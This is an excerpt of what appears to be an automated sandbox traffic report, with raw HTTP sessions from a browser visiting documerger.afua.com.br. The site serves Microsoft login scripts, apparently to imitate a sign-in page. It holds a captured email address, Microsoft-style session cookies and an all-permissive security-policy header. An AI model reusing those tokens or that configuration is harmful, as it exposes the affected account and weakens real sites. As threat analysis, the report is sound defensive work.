                                                  2024-11-27 17:10:01 UTC1028OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 26 73 73 6f 5f 72 65 6c 6f 61 64 3d 74 72 75 65 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true","referrer":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","violated-directive":"script-src-elem","effective-directive":"scri
                                                  2024-11-27 17:10:02 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T171001Z-174f78459685726chC1EWRsnbg0000000x7000000000m0ym
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:10:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:10:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  79192.168.2.64979513.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:01 UTC642OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 1142
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:10:01 UTC1142OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 26 73 73 6f 5f 72 65 6c 6f 61 64 3d 74 72 75 65 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true","referrer":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","violated-directive":"script-src-elem","effective-directive":"scri
                                                  2024-11-27 17:10:01 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T171001Z-174f7845968n2hr8hC1EWR9cag0000000wt000000000qgkz
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:10:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:10:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  80192.168.2.64979113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:01 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:01 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 470
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                  ETag: "0x8DC582BBB181F65"
                                                  x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171001Z-174f784596886s2bhC1EWR743w0000000x9000000000ams3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:01 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  81192.168.2.64978913.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:01 UTC642OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 1141
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:10:01 UTC1141OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 26 73 73 6f 5f 72 65 6c 6f 61 64 3d 74 72 75 65 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true","referrer":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","violated-directive":"script-src-elem","effective-directive":"scri
                                                  2024-11-27 17:10:04 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:04 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T171001Z-174f7845968xlwnmhC1EWR0sv80000000x3g0000000075np
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:10:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:10:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  82192.168.2.64980013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:01 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:01 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 502
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB6A0D312"
                                                  x-ms-request-id: 63854d8c-901e-007b-2581-3fac50000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171001Z-174f7845968frfdmhC1EWRxxbw0000000xb0000000004kdz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:01 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  83192.168.2.64979913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:01 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:01 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                  ETag: "0x8DC582BB556A907"
                                                  x-ms-request-id: 5810e7a8-301e-0000-3f91-3feecc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171001Z-174f7845968g6hv8hC1EWR1v2n000000054000000000geuw
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:01 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  84192.168.2.64979313.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:01 UTC642OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 1141
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:10:01 UTC1141OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 26 73 73 6f 5f 72 65 6c 6f 61 64 3d 74 72 75 65 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true","referrer":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","violated-directive":"script-src-elem","effective-directive":"scri
                                                  2024-11-27 17:10:01 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T171001Z-174f7845968vqt9xhC1EWRgten0000000x9g00000000987t
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:10:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:10:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  85192.168.2.64979413.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:01 UTC642OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 1116
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:10:01 UTC1116OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 26 73 73 6f 5f 72 65 6c 6f 61 64 3d 74 72 75 65 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true","referrer":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","violated-directive":"script-src-elem","effective-directive":"scri
                                                  2024-11-27 17:10:06 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:06 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T171001Z-174f78459685m244hC1EWRgp2c0000000x2000000000c8ae
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:10:06 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:10:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  86192.168.2.64980894.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:03 UTC1491OUTGET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:03 UTC1384INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:03 GMT
                                                  Content-Type: application/x-javascript
                                                  content-length: 57510
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Sat, 26 Oct 2024 01:33:48 GMT
                                                  ETag: 0x8DCF55E3D91C34E
                                                  x-ms-request-id: 0de4e4f4-901e-0024-08d9-3f35f6000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171003Z-1544c49f7f8fm8qzhC1ZRHx53400000002r0000000007n80
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                  2024-11-27 17:10:03 UTC10INData Raw: 1f 8b 08 00 00 00 00 00 00 03
                                                  Data Ascii:
                                                  2024-11-27 17:10:04 UTC16334INData Raw: dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 33 52 48 32 a2 09 14 c8 7e 04 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd f5 95 95 95 95 95 99 95 99 fd 87 f9 da 9f c6 5e e0 ef 89 fd 47 f5 bb 10 ec f9 fb 8f de 7c cf fb d1 ff 79 3f 14 f1 3a f4 0b f8 bb 24 3e ad 82 30 8e 5e 7d 74 c3 42 dc c0 57 8d 47 f9 ae fe f8 d9 f1 66 75 df 59 04 ee 4c cc ea 7f a8 7c 7e 25 9b 0a 6c 3a 75 17 8b bd 58 f5 e0 c4 4e f2 3b d8 87 07 6e d6 f8 43 39 29 f8 8c c3 78 8d 47 dd 51 50 5a 36 84 13 94 a6 0d 0f fe 5d 35 8a 45 27 d8 2b ef 7f de fb 31 99 86 13 38 1e 00 bf 57 dd 27 28 fd 86 b7 57 81 fe e1 cf e1 be 13 c2 9f a3 7d c7 6d 84 a5 51 1c 7a fe 4d f4
                                                  Data Ascii: }Ms#\@'F3RH2~Qx7}'}?e#QU]Vo^G|y?:$>0^}tBWGfuYL|~%l:uXN;nC9)xGQPZ6]5E'+18W'(W}mQzM


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  87192.168.2.64980313.107.246.63443
                                                  TimestampBytes transferredDirectionData
